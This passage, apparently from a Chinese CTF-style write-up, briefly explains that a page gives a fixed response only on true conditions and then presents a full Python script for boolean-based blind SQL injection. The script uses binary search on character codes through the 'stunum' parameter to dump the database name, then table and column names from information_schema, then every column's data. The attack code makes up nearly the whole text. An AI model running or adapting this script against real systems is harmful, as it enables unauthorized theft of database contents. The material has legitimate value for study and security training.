如下:
输入正确的话可以有固定回显,其他的没有。经过测试,其实并没有把数据库中的内容提出来显示。因此只能盲注了。
脚本如下:
import time
import requests
import re
Success_message = "Hi"
def cont(text):
obj=re.compile(r'<h2 class="mb">(?P<xiao>.*?)</h2>',re.S)
res = obj.finditer(text)
for i in res:
c=(i.group("xiao"))
return c
def database_name():
db_name = ''
for i in range(1, 10):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
db_name += chr(mid)
print("数据库名: " + db_name)
return db_name
def table_name():
name = ''
for j in range(1, 100):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
time.sleep(0.2)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
name += chr(mid)
print("表名: " + name)
table_list = name.split(",")
for tab_name in table_list:
column_name(tab_name)
def column_name(tab_name):
name = ''
for j in range(1, 100):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
'1)) > %d)' % (tab_name, j, mid)
time.sleep(0.2)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
name += chr(mid)
print(("%s表的字段名: " + name) % tab_name)
column_list = name.split(",")
for col_name in column_list:
get_data(tab_name, col_name)
def get_data(tab_name, col_name):
data = ''
for i in range(1, 100):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (col_name, tab_name, i, mid)
time.sleep(0.2)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
data += chr(mid)
print(("%s表的%s字段数据: " + data) % (tab_name, col_name))
if __name__ == '__main__':
url = input("请输入url:")
database_name()
table_name()